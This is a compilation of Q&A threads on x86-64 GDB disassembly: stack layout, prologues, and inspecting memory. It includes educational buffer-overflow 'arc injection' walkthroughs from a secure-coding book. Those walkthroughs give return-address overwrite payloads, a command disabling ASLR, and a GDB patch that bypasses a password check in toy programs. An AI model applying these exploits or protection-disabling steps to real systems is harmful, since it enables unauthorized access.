I'm analyzing the disassembly of the following (very simple) C program in GDB on X86_64.
int main()
{
int a = 5;
int b = a + 6;
return 0;
}
I understand that in X86_64 the stack grows down. That is the top of the stack has a lower address than the bottom of the stack. The assembler from the above program is as follows:
Dump of assembler code for function main:
0x0000000000400474 <+0>: push %rbp
0x0000000000400475 <+1>: mov %rsp,%rbp
0x0000000000400478 <+4>: movl $0x5,-0x8(%rbp)
0x000000000040047f <+11>: mov -0x8(%rbp),%eax
0x0000000000400482 <+14>: add $0x6,%eax
0x0000000000400485 <+17>: mov %eax,-0x4(%rbp)
0x0000000000400488 <+20>: mov $0x0,%eax
0x000000000040048d <+25>: leaveq
0x000000000040048e <+26>: retq
End of assembler dump.
I understand that:
We push the base pointer on the stack.
We then copy the value of the stack pointer to the base pointer.
We then copy the value 5 into the address -0x8(%rbp). Since in an int is 4 bytes shouldn't this be at next address in the stack which is -0x4(%rbp) rather than -0x8(%rbp)?.
We then copy the value at the variable a into %eax, add 6 and then copy the value into the address at -0x4(%rbp).
Using the this graphic for reference:
(source: thegreenplace.net)
it looks like the stack has the following contents:
|--------------|
| rbp | <-- %rbp
| 11 | <-- -0x4(%rbp)
| 5 | <-- -0x8(%rbp)
when I was expecting this:
|--------------|
| rbp | <-- %rbp
| 5 | <-- -0x4(%rbp)
| 11 | <-- -0x8(%rbp)
which seems to be the case in 7-understanding-c-by-learning-assembly where they show the assembly:
(gdb) disassemble
Dump of assembler code for function main:
0x0000000100000f50 <main+0>: push %rbp
0x0000000100000f51 <main+1>: mov %rsp,%rbp
0x0000000100000f54 <main+4>: mov $0x0,%eax
0x0000000100000f59 <main+9>: movl $0x0,-0x4(%rbp)
0x0000000100000f60 <main+16>: movl $0x5,-0x8(%rbp)
0x0000000100000f67 <main+23>: mov -0x8(%rbp),%ecx
0x0000000100000f6a <main+26>: add $0x6,%ecx
0x0000000100000f70 <main+32>: mov %ecx,-0xc(%rbp)
0x0000000100000f73 <main+35>: pop %rbp
0x0000000100000f74 <main+36>: retq
End of assembler dump.
Why is the value of b is being put into a higher memory address in the stack than a when a is clearly declared and initialized first?
The value of b is put on the stack wherever the compiler feels like it. You have no influence over it. And you shouldn't. It's possible that the order will change between minor versions of the compiler because some internal data structure was changed or some code rearranged. Some compilers will even randomize the layout of the stack on different compilations on purpose because it can make certain bugs harder to exploit.
In fact, the compiler might not use the stack at all. There's no need to. Here's the disassembly of the same program compiled with some optimizations enabled:
$ cat > foo.c
int main()
{
int a = 5;
int b = a + 6;
return 0;
}
$ cc -O -c foo.c
$ objdump -S foo.o
foo.o: file format elf64-x86-64
Disassembly of section .text:
0000000000000000 <main>:
0: 31 c0 xor %eax,%eax
2: c3 retq
$
With some simple optimizations the compiler figured out that you don't use the variable 'b', so there's no need to calculate it. And because of that you don't use the variable 'a' either, so there's no need to assign it. Only a compilation with no optimizations (or a very bad compiler) will put anything on the stack here. And even if you use the values basic optimizations will put them into registers because touching the stack is expensive.
Related
I'm new to security and currently referring to Robert Seacord's Secure Coding in C and C++. In chapter 2 of the same, the author talks about arc injection, wherein he passes the flow of control in the following program from the isPasswordOK() routine to the else() {puts ("Access granted!");}; branch in main() by overwriting the Password buffer in gets() call with a tainted string: 1234567890123456j>*!
#include <stdio.h>
#include <string.h>
#include <stdbool.h>
bool isPasswordOK(void) {
char Password[12];
gets(Password);
return 0 == strcmp(Password, "goodpass");
}
int main(void) {
bool pwStatus;
puts("Enter Password: ");
pwStatus = isPasswordOK();
if (pwStatus == false) {
puts("Access denied");
exit(-1);
}
else {
puts("Access granted!");
}
}
Here, j = 0x6A, > = 0x10 (This is the Data Link Escape symbol), * = 0x2A and ! = 0x21
This sequence of 4 characters then correspond to a 4 byte address, which I'm assuming is 0x6A102A21. This address, I think, points to the else line in the main() function, and we redirect control by overwriting the return address on the stack by the address of this line.
I'm trying to reproduce the same on my machine (x86-64 architecture). I've turned stack protection and randomization off, so I don't think that should be a issue. In fact, the program crashes as expected when I try to corrupt the return address. My problem is: how do I provide as an input to gets the tainted string? If I disassemble main using gdb, I get the following output:
(gdb) disassemble main
Dump of assembler code for function main:
0x0000000000400642 <+0>: push %rbp
0x0000000000400643 <+1>: mov %rsp,%rbp
0x0000000000400646 <+4>: sub $0x10,%rsp
0x000000000040064a <+8>: mov $0x40071d,%edi
0x000000000040064f <+13>: callq 0x4004c0 <puts#plt>
0x0000000000400654 <+18>: callq 0x400616 <isPasswordOK>
0x0000000000400659 <+23>: mov %al,-0x1(%rbp)
0x000000000040065c <+26>: movzbl -0x1(%rbp),%eax
0x0000000000400660 <+30>: xor $0x1,%eax
0x0000000000400663 <+33>: test %al,%al
0x0000000000400665 <+35>: je 0x40067b <main+57>
0x0000000000400667 <+37>: mov $0x40072e,%edi
0x000000000040066c <+42>: callq 0x4004c0 <puts#plt>
0x0000000000400671 <+47>: mov $0xffffffff,%edi
0x0000000000400676 <+52>: callq 0x400510 <exit#plt>
0x000000000040067b <+57>: mov $0x40073c,%edi
0x0000000000400680 <+62>: callq 0x4004c0 <puts#plt>
0x0000000000400685 <+67>: leaveq
0x0000000000400686 <+68>: retq
End of assembler dump.
Since I want to jump to the second puts() call, I think I need to provide 0x0000000000400680 as a part of my tainted string because this is the address of the second puts() according to the gdb disassembly.
How can I do this? In the book, the address were of length 4 bytes, but here I have to deal with 16 bytes. Also, there is no ASCII representation for 0x80, so what am I supposed to provide as an input to gets? Basically, what I'm asking for are the characters that I should provide at ?:
1234567890123456????
I'm utterly confused, so any help is appreciated, thanks!
I had the same problem and I will try to help you. The problem is that the string highly depends also on the compiler, so I will explain you how to get the string acording to my example.
My program looks like this (similar to yours)
isPasswordOk.cpp:
#include <iostream>
#include <cstdio>
#include <cstring>
bool isPasswordOk()
{
int result = 0xBBBBBBBB;
char password[10];
std::gets(password);
result = strcmp(password, "good") == 0;
return result;
}
int main()
{
bool pwStatus;
std::puts("Enter password:");
pwStatus = isPasswordOk();
if (pwStatus == false)
{
puts("Access denied!");
return -1;
}
puts("Access granted!");
return 0;
}
Then how do you compile this:
g++ isPasswordOk.cpp -std=c++11 -fno-stack-protector -o isPasswordOk
Important is the -fno-stack-protector, so not canarys are created. You can ofcourse use another c++ standard. But my example does not compile with std=c++14, because the gets function was removed.
Stack when calling isPasswordOk()
+-------------------------+ <--- stack pointer (rsp/esp)
| |
| password-buffer |
| |
| -------------------- |
| result | 0xBBBBBBBB
| --------------------- |
| (canary) | # when not disabled
+-------------------------+ <--- RBP
| Caller RBP frame ptr |
| --------------------- |
| Return Addr Caller |
+-------------------------+
Now use gdb to get the string to do the arc-injection.
gdb isPasswordOk
(gdb) run
Enter password:
AAAA
Access denied!
(gdb) disassemble isPasswordOk
Dump of assembler code for function _Z12isPasswordOkv:
0x0000555555554850 <+0>: push %rbp
0x0000555555554851 <+1>: mov %rsp,%rbp
0x0000555555554854 <+4>: sub $0x10,%rsp
0x0000555555554858 <+8>: movl $0xbbbbbbbb,-0x4(%rbp)
0x000055555555485f <+15>: lea -0x10(%rbp),%rax
0x0000555555554863 <+19>: mov %rax,%rdi
0x0000555555554866 <+22>: callq 0x555555554710
0x000055555555486b <+27>: lea -0x10(%rbp),%rax
0x000055555555486f <+31>: lea 0x14f(%rip),%rsi # 0x5555555549c5
0x0000555555554876 <+38>: mov %rax,%rdi
0x0000555555554879 <+41>: callq 0x555555554718
0x000055555555487e <+46>: test %eax,%eax
0x0000555555554880 <+48>: sete %al
0x0000555555554883 <+51>: movzbl %al,%eax
0x0000555555554886 <+54>: mov %eax,-0x4(%rbp)
0x0000555555554889 <+57>: cmpl $0x0,-0x4(%rbp)
0x000055555555488d <+61>: setne %al
0x0000555555554890 <+64>: leaveq
0x0000555555554891 <+65>: retq
End of assembler dump.
Now set some breakpoints
(gdb) break * 0x0000555555554858 # set breakpoint before gets
(gdb) break * 0x0000555555554879 # set breakpoint after gets
Now run it again (with the x option you can print the memory):
(gdb) run
Enter password:
AAAA
(gdb) x/12xw $rsp # rsp for 64 bit, esp for 32 bit
0x7fffffffde20: 0xffffde50 0x00007fff 0x55554720 0x00005555
0x7fffffffde30: 0xffffde50 0x00007fff 0x555548ab 0x00005555
0x7fffffffde40: 0xffffdf30 0x00007fff 0x00000000 0x00000000
(gdb) c
(gdb) x/12xw $rsp
0x7fffffffde20: 0x41414141 0x00007fff 0x55554720 0xBBBBBBBB # 0x41='A'
0x7fffffffde30: 0xffffde50 0x00007fff 0x555548ab 0x00005555
0x7fffffffde40: 0xffffdf00 0x00007fff 0x00000000 0x00000000
Access denied!
So the password was written on the address 0x7fffffffde20: 0x41414141 = "AAAA"
The local variable result is put after the buffer 0xBBBBBBBB.
You can also see that the buffer is internally 12 bytes, also I defined it to be 10 bytes.
So if I want to overwrite the Return Addr Caller 0x555548ab 0x00005555 I must write 0x20 (32) bytes.
First I have to know the address. Therefore I use the gdb again:
(gdb) disass main
Dump of assembler code for function main:
0x0000555555554892 <+0>: push %rbp
0x0000555555554893 <+1>: mov %rsp,%rbp
0x0000555555554896 <+4>: sub $0x10,%rsp
0x000055555555489a <+8>: lea 0x128(%rip),%rdi # 0x5555555549c9
0x00005555555548a1 <+15>: callq 0x5555555546f0
0x00005555555548a6 <+20>: callq 0x555555554850 <_Z12isPasswordOkv>
0x00005555555548ab <+25>: mov %al,-0x1(%rbp)
0x00005555555548ae <+28>: movzbl -0x1(%rbp),%eax
0x00005555555548b2 <+32>: xor $0x1,%eax
0x00005555555548b5 <+35>: test %al,%al
0x00005555555548b7 <+37>: je 0x5555555548cc <main+58>
0x00005555555548b9 <+39>: lea 0x119(%rip),%rdi # 0x5555555549d9
0x00005555555548c0 <+46>: callq 0x5555555546f0
0x00005555555548c5 <+51>: mov $0xffffffff,%eax
0x00005555555548ca <+56>: jmp 0x5555555548dd <main+75>
0x00005555555548cc <+58>: lea 0x115(%rip),%rdi # 0x5555555549e8
0x00005555555548d3 <+65>: callq 0x5555555546f0
0x00005555555548d8 <+70>: mov $0x0,%eax
0x00005555555548dd <+75>: leaveq
0x00005555555548de <+76>: retq
End of assembler dump.
I want to jump to the address 0x00005555555548cc. So you have to create the string like this:
echo -ne 'AAAAAAAAAAAAAAAAAAAAAAAA\xcc\x48\x55\x55\x55\x55\x00\x00' > arcInjection.txt
Then you can call it by running:
(gdb) run < arcInjection.txt
Access granted!
If you want to run it outside the gdb, you have to disable address space layout randomization (ASR)
echo 0 | sudo tee /proc/sys/kernel/randomize_va_space
Then you can run it also in the console:
./isPasswordOk < arcInjection.txt
Enter password:
Access granted!
The ASR is activated again after reboot, or if you call afterwards:
echo 1 | sudo tee /proc/sys/kernel/randomize_va_space
Hello i have such code
#include <stdio.h>
#define SECRET "1234567890AZXCVBNFRT"
int checksecret(){
char buf[32];
gets(buf);
if(strcmp(SECRET,buf)==0) return 1;
else return 0;
}
void outsecret(){
printf("%s\n",SECRET);
}
int main(int argc, char** argv){
if (checksecret()){
outsecret();
};
}
disass of outsecret
(gdb) disassemble outsecret
Dump of assembler code for function outsecret:
0x00000000004005f4 <+0>: push %rbp
0x00000000004005f5 <+1>: mov %rsp,%rbp
0x00000000004005f8 <+4>: mov $0x4006b4,%edi
0x00000000004005fd <+9>: callq 0x400480 <puts#plt>
0x0000000000400602 <+14>: pop %rbp
0x0000000000400603 <+15>: retq
I have an assumption that i don't know SECRET, so i try to run my program with such string python -c 'print "A" * 32 + "\x40\x05\xf4"[::-1]'. But it fails with segmentation fault. What i am doing wrong? Thank you for any help.
PS
I want to call function outsecret by overwriting return code in checksecret
You have to remember that all strings have an extra character that terminates the string, so if you input 32 characters then gets will write 33 characters to the buffer. Writing beyond the limits of an array leads to undefined behavior which often leads to crashes.
The gets function have no bounds-checking, and is very dangerous to use. It has been deprecated since long, and in the latest C11 standard it has even been removed.
$ python -c 'print "A" * 32 + "\x40\x05\xf4"[::1]'
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA#
$ perl -le 'print length("AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA#")'
33
Your input string is too long for buffer size of 32 characters (extra one is needed for '\0' terminating null character). You are victim to buffer or array overflow (sometimes also called as array overrun).
Note that gets() is deprecated in C99 and eventually it has been dropped in C11 Standard for security reasons.
I want to call function outsecret by overwriting return code in
checksecret
Beware, you are about to leave relatively safe regions of C Standard. This means that behaviour is relative to compiler, compiler's versions, optimization settings, ABI and so on (maybe inclucing current phase of moon).
As of x86 calling conventions integer return value is stored directly in %eax register (that's assuming that you have x86 or x86-64 CPU). Stack-likely-located array buf is handled by %rbp offsets within current stack frame. Let's consult with gdb disassemble command:
$ gcc -O0 test.c
$ gdb -q a.out
(gdb) b checksecret
(gdb) r
Breakpoint 1, 0x0000000000400631 in checksecret ()
(gdb) disas
Dump of assembler code for function checksecret:
0x000000000040062d <+0>: push %rbp
0x000000000040062e <+1>: mov %rsp,%rbp
=> 0x0000000000400631 <+4>: sub $0x30,%rsp
0x0000000000400635 <+8>: mov %fs:0x28,%rax
0x000000000040063e <+17>: mov %rax,-0x8(%rbp)
0x0000000000400642 <+21>: xor %eax,%eax
0x0000000000400644 <+23>: lea -0x30(%rbp),%rax
0x0000000000400648 <+27>: mov %rax,%rdi
0x000000000040064b <+30>: callq 0x400530 <gets#plt>
0x0000000000400650 <+35>: lea -0x30(%rbp),%rax
0x0000000000400654 <+39>: mov %rax,%rsi
0x0000000000400657 <+42>: mov $0x400744,%edi
0x000000000040065c <+47>: callq 0x400510 <strcmp#plt>
0x0000000000400661 <+52>: test %eax,%eax
0x0000000000400663 <+54>: jne 0x40066c <checksecret+63>
0x0000000000400665 <+56>: mov $0x1,%eax
0x000000000040066a <+61>: jmp 0x400671 <checksecret+68>
0x000000000040066c <+63>: mov $0x0,%eax
0x0000000000400671 <+68>: mov -0x8(%rbp),%rdx
0x0000000000400675 <+72>: xor %fs:0x28,%rdx
0x000000000040067e <+81>: je 0x400685 <checksecret+88>
0x0000000000400680 <+83>: callq 0x4004f0 <__stack_chk_fail#plt>
0x0000000000400685 <+88>: leaveq
0x0000000000400686 <+89>: retq
There is no way overwrite %eax directly from C code, but what you could do is to overwrite selective fragment of code section. In your case what you want is to replace:
0x000000000040066c <+63>: mov $0x0,%eax
with
0x000000000040066c <+63>: mov $0x1,%eax
It's easy to accomplish by gdb itself:
(gdb) x/2bx 0x40066c
0x40066c <checksecret+63>: 0xb8 0x00
set {unsigned char}0x40066d = 1
Now let's confirm it:
(gdb) x/i 0x40066c
0x40066c <checksecret+63>: mov $0x1,%eax
From that point checksecret() is returning 1 even if SECRET does not match. However It wouldn't be so easy to do it by buf itself, as you need to know (guess somehow?) correct offset of particular code section instruction.
Above answers are pretty clear and corret way to exploit buffer overflow vulnerability. But there is a different way to do same thing without exploit vulnerability.
mince#rootlab tmp $ gcc test.c -o test
mince#rootlab tmp $ strings test
/lib64/ld-linux-x86-64.so.2
libc.so.6
gets
puts
__stack_chk_fail
strcmp
__libc_start_main
__gmon_start__
GLIBC_2.4
GLIBC_2.2.5
UH-X
UH-X
[]A\A]A^A_
1234567890AZXCVBNFRT
;*3$
Please look at last 2 row. You will see your secret key in there.
A simple example that demonstrates my issue:
// test.c
#include <stdio.h>
int foo1(int i) {
i = i * 2;
return i;
}
void foo2(int i) {
printf("greetings from foo! i = %i", i);
}
int main() {
int i = 7;
foo1(i);
foo2(i);
return 0;
}
$ clang -o test -O0 -Wall -g test.c
Inside GDB I do the following and start the execution:
(gdb) b foo1
(gdb) b foo2
After reaching the first breakpoint, I disassemble:
(gdb) disassemble
Dump of assembler code for function foo1:
0x0000000000400530 <+0>: push %rbp
0x0000000000400531 <+1>: mov %rsp,%rbp
0x0000000000400534 <+4>: mov %edi,-0x4(%rbp)
=> 0x0000000000400537 <+7>: mov -0x4(%rbp),%edi
0x000000000040053a <+10>: shl $0x1,%edi
0x000000000040053d <+13>: mov %edi,-0x4(%rbp)
0x0000000000400540 <+16>: mov -0x4(%rbp),%eax
0x0000000000400543 <+19>: pop %rbp
0x0000000000400544 <+20>: retq
End of assembler dump.
I do the same after reaching the second breakpoint:
(gdb) disassemble
Dump of assembler code for function foo2:
0x0000000000400550 <+0>: push %rbp
0x0000000000400551 <+1>: mov %rsp,%rbp
0x0000000000400554 <+4>: sub $0x10,%rsp
0x0000000000400558 <+8>: lea 0x400644,%rax
0x0000000000400560 <+16>: mov %edi,-0x4(%rbp)
=> 0x0000000000400563 <+19>: mov -0x4(%rbp),%esi
0x0000000000400566 <+22>: mov %rax,%rdi
0x0000000000400569 <+25>: mov $0x0,%al
0x000000000040056b <+27>: callq 0x400410 <printf#plt>
0x0000000000400570 <+32>: mov %eax,-0x8(%rbp)
0x0000000000400573 <+35>: add $0x10,%rsp
0x0000000000400577 <+39>: pop %rbp
0x0000000000400578 <+40>: retq
End of assembler dump.
GDB obviously uses different offsets (+7 in foo1 and +19 in foo2), with respect to the beginning of the function, when setting the breakpoint. How can I determine this offset by myself without using GDB?
gdb uses a few methods to decide this information.
First, the very best way is if your compiler emits DWARF describing the function. Then gdb can decode the DWARF to find the end of the prologue.
However, this isn't always available. GCC emits it, but IIRC only when optimization is used.
I believe there's also a convention that if the first line number of a function is repeated in the line table, then the address of the second instance is used as the end of the prologue. That is if the lines look like:
< function f >
line 23 0xffff0000
line 23 0xffff0010
Then gdb will assume that the function f's prologue is complete at 0xfff0010.
I think this is the mode used by gcc when not optimizing.
Finally gdb has some prologue decoders that know how common prologues are written on many platforms. These are used when debuginfo isn't available, though offhand I don't recall what the purpose of that is.
As others mentioned, even without debugging symbols GDB has a function prologue decoder, i.e. heuristic magic.
To disable that, you can add an asterisk before the function name:
break *func
On Binutils 2.25 the skip algorithm on seems to be at: symtab.c:skip_prologue_sal, which breakpoints.c:break_command, the command definition, calls indirectly.
The prologue is a common "boilerplate" used at the start of function calls.
The prologues of foo2 is longer than that of foo1 by two instructions because:
sub $0x10,%rsp
foo2 calls another function, so it is not a leaf function. This prevents some optimizations, in particular it must reduce the rsp before another call to save room for the local state.
Leaf functions don't need that because of the 128 byte ABI red zone, see also: Why does the x86-64 GCC function prologue allocate less stack than the local variables?
foo1 however is a leaf function.
lea 0x400644,%rax
For some reason, clang stores the address of local string constants (stored in .rodata) in registers as part of the function prologue.
We know that rax contains "greetings from foo! i = %i" because it is then passed to %rdi, the first argument of printf.
foo1 does not have local strings constants however.
The other instructions of the prologue are common to both functions:
rbp manipulation is discussed at: What is the purpose of the EBP frame pointer register?
mov %edi,-0x4(%rbp) stores the first argument on the stack. This is not required on leaf functions, but clang does it anyways. It makes register allocation easier.
On ELF platforms like linux, debug information is stored in a separate (non-executable) section in the executable. In this separate section there is all the information that is needed by the debugger. Check the DWARF2 specification for the specifics.
For example in the following code
"justatest" and the format "%s" is defined in heap:
char str[15]="justatest";
int main(){
printf("%s",str);
return 0;
}
in GDB,i got the assembly code before call to printf as:
=> 0x0804841f <+14>: movl $0x804a020,0x4(%esp)
0x08048427 <+22>: movl $0x80484d8,(%esp)
0x0804842e <+29>: call 0x80482f0 <printf#plt>
Do i have to examine the parameter 1by1 using "x/s 0x804a020" and "x/s 0x80484d8"
or is there a Table of constants defined in heap that i can directly refer to?
thanks!
Your understanding about str reside on heap is not correct. Its global variable which gets stored into the data segment. Regarding your print global variable, you can do as follows on my GNU/Linux terminal.
$ gcc -g -Wall hello.c
$ gdb -q ./a.out
Reading symbols from /home/mantosh/practice/a.out...done.
(gdb) break main
Breakpoint 1 at 0x400524: file hello.c, line 6.
(gdb) run
Starting program: /home/mantosh/practice/a.out
Breakpoint 1, main () at bakwas.c:6
6 printf("%s",str);
(gdb) disassemble main
Dump of assembler code for function main:
0x0000000000400520 <+0>: push %rbp
0x0000000000400521 <+1>: mov %rsp,%rbp
=> 0x0000000000400524 <+4>: mov $0x601020,%esi
0x0000000000400529 <+9>: mov $0x4005e4,%edi
0x000000000040052e <+14>: mov $0x0,%eax
0x0000000000400533 <+19>: callq 0x4003f0 <printf#plt>
0x0000000000400538 <+24>: mov $0x0,%eax
0x000000000040053d <+29>: pop %rbp
0x000000000040053e <+30>: retq
End of assembler dump.
(gdb) p str
$1 = "justatest\000\000\000\000\000"
(gdb) p &str
$2 = (char (*)[15]) 0x601020
// These are addresses of two arguments which would be passed in printf.
// From assembly instruction we can verify that before calling the printf
// these are getting stored into the registers.
(gdb) x/s 0x4005e4
0x4005e4: "%s"
(gdb) x/s 0x601020
0x601020 <str>: "justatest
later i found that for object files without a debugging symbols table
objdump -t obj
would contains most of the symbols of global variables/functions and their address
,and
objdump -D obj instead of -d
would include all sections such as .text/.data/.rodata instead of .text only
these two combined provided sufficient access to what i mentioned aboved, such as switch tables/const strings/global variables
i am currently working on gdb disassembly to help me understand more detail about the c program so i write a c program:
#include <stdio.h>
void swap(int a, int b){
int temp = a;
a = b;
b = temp;
}
void main(){
int a = 1,b = 2;
swap(a, b);
}
I use gdb and run disass /m main to get those:
(gdb) disass /m main
Dump of assembler code for function main:
8 void main(){
0x0000000000400492 <+0>: push %rbp
0x0000000000400493 <+1>: mov %rsp,%rbp
0x0000000000400496 <+4>: sub $0x10,%rsp
9 int a = 1,b = 2;
0x000000000040049a <+8>: movl $0x1,-0x8(%rbp)
0x00000000004004a1 <+15>: movl $0x2,-0x4(%rbp)
10 swap(a, b);
0x00000000004004a8 <+22>: mov -0x4(%rbp),%edx
0x00000000004004ab <+25>: mov -0x8(%rbp),%eax
0x00000000004004ae <+28>: mov %edx,%esi
0x00000000004004b0 <+30>: mov %eax,%edi
0x00000000004004b2 <+32>: callq 0x400474 <swap>
11 }
0x00000000004004b7 <+37>: leaveq
0x00000000004004b8 <+38>: retq
End of assembler dump.
My question is those -0x8(%rbp) means what?
A memory or a register?
I do know that 1 is store in -0x8(%rbp) and 2 is in -0x4(%rbp), How can i show the value in
thoes kind of 'place' ?
I try to use (gdb) p -0x8(%rbp) but get this:
A syntax error in expression, near `%rbp)'.
Registers in gdb can be referred with the prefix '$'
p *(int *)($rbp - 8)
RBP and RSP most likely refer to memory locations, specifically to stack. Other registers are more or less generic purpose registers and can point to memory too.
It means "the data stored when you subtract eight from the address stored in rbp". Try looking at the stack commands available in gdb: http://www.delorie.com/gnu/docs/gdb/gdb_41.html
The actually meaning of those structures such as -0x8(%rbp) depends on the architecture (or the assembly language). But in this case, -0x8(%rbp) is a memory address, probably value of %rbp minus 8.
In gdb, you can print the value of those memory address by doing something like
info r rbp
p *(int *)(value_of_rbp - 8)